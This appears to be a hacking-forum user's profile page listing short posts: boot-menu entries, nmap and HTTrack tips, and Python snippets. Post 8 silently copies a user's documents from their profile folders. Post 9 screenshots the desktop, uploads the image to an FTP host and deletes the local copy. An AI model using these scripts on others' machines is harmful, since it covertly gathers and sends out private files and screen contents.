Jump to content

ls

Active Members
  • Posts

    122
  • Joined

  • Last visited

Recent Profile Visitors

4,381 profile views

ls's Achievements

Newbie

Newbie (1/14)

  1. I started with http://hetland.org/writing/instant-hacking.html it's a great introduction
  2. ls

    Breaking out...

    You could use jondo, it's also a proxy program but it's more secure than your average web proxy https://www.jondos.de/en/jondonym
  3. We really should get all the menu.lst entries in one place. Here are some of mines: Invaders : http://www.erikyyy.de/invaders/ title invaders kernel /images/invaders/invaders boot Slitaz : http://www.slitaz.org/en/ title slitaz kernel /images/slitaz/boot/bzImage root=/dev/null vga=771 initrd /images/slitaz/boot/rootfs.gz Clonezilla: http://clonezilla.org/ title clonezilla root (hd0,3) kernel /images/clonezilla/live/vmlinuz1 boot=live union=aufs vga=788 ip=frommedia live-media-path=/images/clonezilla/live bootfrom=/dev/hda toram=filesystem.squashfs initrd /images/clonezilla/live/initrd1.img boot Tinycore: http://www.tinycorelinux.com/ title Tinycore kernel /images/tinycore/boot/bzImage initrd /images/tinycore/boot/tinycore.gz
  4. ls

    nmap ?

    You can use nmap -sP 192.168.0.1/24 to do a simple ping sweep of the range 192.168.0.1 - 192.168.0.255. But you may want to check out autoscan http://autoscan-network.com. From the autoscan website:
  5. You can use HTTrack to create an offline copy from a website: http://www.httrack.com/
  6. ls

    Small surf OS?

    What about puppy linux? http://www.puppylinux.org/
  7. You can use peerguardian on linux to: http://ubuntuforums.org/showthread.php?t=95793
  8. I wrote some code to do this in this post: http://hak5.org/forums/index.php?showtopic=11833 this was the code: import os,shutil exts = [".txt",".doc",".docx",".xls",".xlsx",".ppt",".pptx"] startpath = "C:\\Documents and Settings\\" def find(none, directory, filenames): for file in filenames: for ext in exts: if file.endswith(ext): fullfile = os.path.join(directory,file) try: shutil.copy(fullfile,file) except IOError: pass # access denied os.path.walk(startpath,find, None)
  9. This piece of python will take a screenshot (under linux and windows) and will upload it to an ftp server import os import ftplib FTPHOST = "ftp.example.com" FTPPORT = 21 FTPUSER = "anonymous" FTPPASS = "a@anonymous.com" def upload(filetoupload): ftp = ftplib.FTP() ftp.connect(FTPHOST,FTPPORT) ftp.login(FTPUSER,FTPPASS) f = open(filetoupload,'rb') ftp.storbinary(('STOR '+filetoupload),f) f.close() ftp.quit() def screenshot(shotname): shotname = shotname+".png" if os.name == "nt": import ImageGrab img = ImageGrab.grab() img.save(shotname) upload(shotname) os.remove(shotname) elif os.name == "posix": import gtk.gdk w = gtk.gdk.get_default_root_window() sz = w.get_size() pb = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,False,8,sz[0],sz[1]) pb = pb.get_from_drawable(w,w.get_colormap(),0,0,0,0,sz[0],sz[1]) pb.save(shotname,"png") upload(shotname) os.remove(shotname) screenshot("screenshot")
  10. import urllib2 url = raw_input("Url : ") outputname = url.split('/')[-1] outputname = open(outputname,'w') for line in urllib2.urlopen(url).readlines(): outputname.write(line) outputname.close() print "Done" With this code you can download from http and from ftp you can find more info here: http://docs.python.org/library/urllib.html
  11. The problem with "blackhat" forums where everyone can register is that 90 % of the people there are 15 year old boys who want to hack their school if you are really interested in computer security it's better to go to "whitehat" sites where most people are serious and know what they are talking about. At least that's my experience
  12. Was metasploit defaced, shut down or is it just a prank? http://metasploit.com http://bayimg.com/iaODlAABL
  13. instead of writing chars = ["a","b",.....] you could say chars = list("abcdefghijklmnopqrstuvwxyz") it may save you some time
×
×
  • Create New...